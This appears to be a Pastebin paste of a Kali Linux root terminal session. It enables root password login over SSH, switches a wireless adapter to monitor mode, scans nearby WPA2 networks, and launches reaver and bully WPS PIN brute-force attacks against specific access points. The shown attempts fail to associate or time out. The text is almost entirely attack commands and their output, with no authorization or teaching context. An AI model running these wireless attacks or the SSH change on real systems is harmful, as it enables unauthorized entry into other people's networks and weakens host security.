Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- $ sed -i -e 's/prohibit-password/yes/g' /etc/ssh/sshd_config
- $ service ssh start
- root@kali:~# airmon-ng start wlan0
- Found 3 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them!
- PID Name
- 963 NetworkManager
- 1087 dhclient
- 1534 wpa_supplicant
- PHY Interface Driver Chipset
- phy0 wlan0 rt2800usb Ralink Technology, Corp. RT3572
- (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
- (mac80211 station mode vif disabled for [phy0]wlan0)
- root@kali:~# iwconfig eth0 no wireless extensions.
- wlan0mon IEEE 802.11abgn ESSID:off/any
- Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
- Retry short limit:7 RTS thr:off Fragment thr:off
- Encryption key:off
- Power Management:off
- lo no wireless extensions.
- root@kali:~# ifconfig wlan0mon down
- root@kali:~# iwconfig wlan0mon mode monitor
- root@kali:~# ifconfig wlan0mon up
- root@kali:~# iwconfig eth0 no wireless extensions.
- wlan0mon IEEE 802.11abgn Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
- Retry short limit:7 RTS thr:off Fragment thr:off
- Power Management:off
- lo no wireless extensions.
- root@kali:~# airodump-ng wlan0mon
- BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
- XX:XX:XX:XX -80 2 0 0 1 54e WPA2 CCMP MGT NumA
- XX:XX:XX:XX -28 2 0 0 6 54e WPA2 CCMP PSK NumB
- XX:XX:XX:XX -81 2 0 0 11 54e WPA2 CCMP MGT NumC
- root@kali:~# wash -i wlan0mon
- Wash v1.5.2 WiFi Protected Setup Scan Tool
- Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
- mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
- BSSID Channel RSSI WPS Version WPS Locked ESSID
- ---------------------------------------------------------------------------------------------------------------
- [!] Found packet with bad FCS, skipping...
- [!] Found packet with bad FCS, skipping...
- [!] Found packet with bad FCS, skipping...
- [!] Found packet with bad FCS, skipping...
- root@kali:~# wash -i wlan0mon -C
- Wash v1.5.2 WiFi Protected Setup Scan Tool
- Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
- mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
- BSSID Channel RSSI WPS Version WPS Locked ESSID
- ---------------------------------------------------------------------------------------------------------------
- XX:XX 1 -73 1.0 No WiA
- XX:XX 6 -27 1.0 No WiB
- XX:XX 11 -77 1.0 No WiC
- root@kali:~# reaver -i wlan0mon -b XX:XX:XX:XX -vv
- Reaver v1.5.2 WiFi Protected Setup Attack Tool
- Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
- mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
- [+] Waiting for beacon from XX:XX:XX:XX
- [+] Switching wlan0mon to channel 1
- [+] Switching wlan0mon to channel 2
- [+] Switching wlan0mon to channel 3
- [+] Switching wlan0mon to channel 4
- [+] Switching wlan0mon to channel 5
- [+] Switching wlan0mon to channel 6
- [+] Switching wlan0mon to channel 7
- [+] Switching wlan0mon to channel 8
- [+] Switching wlan0mon to channel 11
- [!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: ESSIDA)
- [!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: ESSIDA)
- [!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: ESSIDA)
- root@kali:~# bully -b XX:XX:XX wlan0mon -c 11
- [!] Bully v1.0-22 - WPS vulnerability assessment utility
- [+] Switching interface 'wlan0mon' to channel '11'
- [!] Using 'XX:XX:XX' for the source MAC address
- [+] Datalink type set to '127', radiotap headers present
- [+] Scanning for beacon from 'XX:XX:XX' on channel '11'
- [!] Excessive (3) FCS failures while reading next packet
- [!] Excessive (3) FCS failures while reading next packet
- [!] Excessive (3) FCS failures while reading next packet
- [!] Disabling FCS validation (assuming --nofcs)
- [+] Got beacon for 'TargetA' (XX:XX:XX)
- [!] Creating new randomized pin file '/root/.bully/pins'
- [+] Index of starting pin number is '0000000'
- [+] Last State = 'NoAssoc' Next pin '36490264'
- [+] Sent packet not acknowledged after 3 attempts
- [+] Tx(DeAuth) = 'Timeout' Next pin '36490264'
- [+] Sent packet not acknowledged after 3 attempts
- [+] Tx(DeAuth) = 'Timeout' Next pin '36490264'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement